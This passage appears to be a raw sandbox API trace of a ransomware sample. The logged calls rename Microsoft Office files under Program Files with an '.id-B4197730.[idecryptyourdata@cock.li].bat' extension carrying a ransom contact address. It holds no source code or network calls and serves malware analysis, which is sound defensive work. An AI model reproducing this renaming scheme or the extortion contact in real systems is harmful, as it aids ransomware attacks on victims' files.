office\\root\\licenses16\\visiostdo365r_subscription-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.387] CloseHandle (hObject=0x51c) returned 1 [0166.388] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.388] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subscription-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.388] CloseHandle (hObject=0x51c) returned 1 [0166.389] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.389] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subscription-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.390] CloseHandle (hObject=0x51c) returned 1 [0166.391] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.391] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.391] CloseHandle (hObject=0x51c) returned 1 [0166.392] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.392] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.392] CloseHandle (hObject=0x51c) returned 1 [0166.393] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.393] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.393] CloseHandle (hObject=0x51c) returned 1 [0166.394] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.394] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.394] CloseHandle (hObject=0x51c) returned 1 [0166.395] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.395] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.395] CloseHandle (hObject=0x51c) returned 1 [0166.396] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.396] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.396] CloseHandle (hObject=0x51c) returned 1 [0166.397] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.397] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.398] CloseHandle (hObject=0x51c) returned 1 [0166.398] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.398] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.399] CloseHandle (hObject=0x51c) returned 1 [0166.399] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.399] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.400] CloseHandle (hObject=0x51c) returned 1 [0166.400] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.400] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.401] CloseHandle (hObject=0x51c) returned 1 [0166.401] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.401] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.402] CloseHandle (hObject=0x51c) returned 1 [0166.402] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.403] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.403] CloseHandle (hObject=0x51c) returned 1 [0166.404] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.404] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.404] CloseHandle (hObject=0x51c) returned 1 [0166.814] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.815] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.815] CloseHandle (hObject=0x51c) returned 1 [0166.816] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.816] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Lync.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\lync.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.816] CloseHandle (hObject=0x51c) returned 1 [0166.817] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.817] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_authored.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_authored.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.817] CloseHandle (hObject=0x51c) returned 1 [0166.818] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.818] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_Common.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_common.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.818] CloseHandle (hObject=0x51c) returned 1 [0166.819] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.819] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_licensing.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_licensing.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.819] CloseHandle (hObject=0x51c) returned 1 [0166.820] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0166.824] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.824] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_postcommon.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_postcommon.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.824] CloseHandle (hObject=0x4c4) returned 1 [0166.825] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.825] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\office32ww.msi.16_crossbitness.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office32ww.msi.16_crossbitness.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.825] CloseHandle (hObject=0x4c4) returned 1 [0166.825] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\office32ww.msi.16_office32ww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office32ww.msi.16_office32ww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\office32ww.msi.16_office32ww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office32ww.msi.16_office32ww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0166.827] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.827] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OneNote.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\onenote.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.828] CloseHandle (hObject=0x4c4) returned 1 [0166.829] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.829] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OneNote.x-none.msi.16_OneNote.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\onenote.x-none.msi.16_onenote.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.829] CloseHandle (hObject=0x4c4) returned 1 [0166.830] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.830] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OSM.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\osm.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.830] CloseHandle (hObject=0x4c4) returned 1 [0166.831] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.831] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OSMUX.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\osmux.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.831] CloseHandle (hObject=0x4c4) returned 1 [0166.832] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Outlook.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\outlook.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Outlook.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\outlook.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0166.832] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.833] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\outlook.x-none.msi.16_postcommon.outlook.x-none.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.833] CloseHandle (hObject=0x4c4) returned 1 [0166.833] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\PowerPivot.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\powerpivot.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\PowerPivot.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\powerpivot.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0166.834] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.834] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\PowerPoint.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\powerpoint.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, 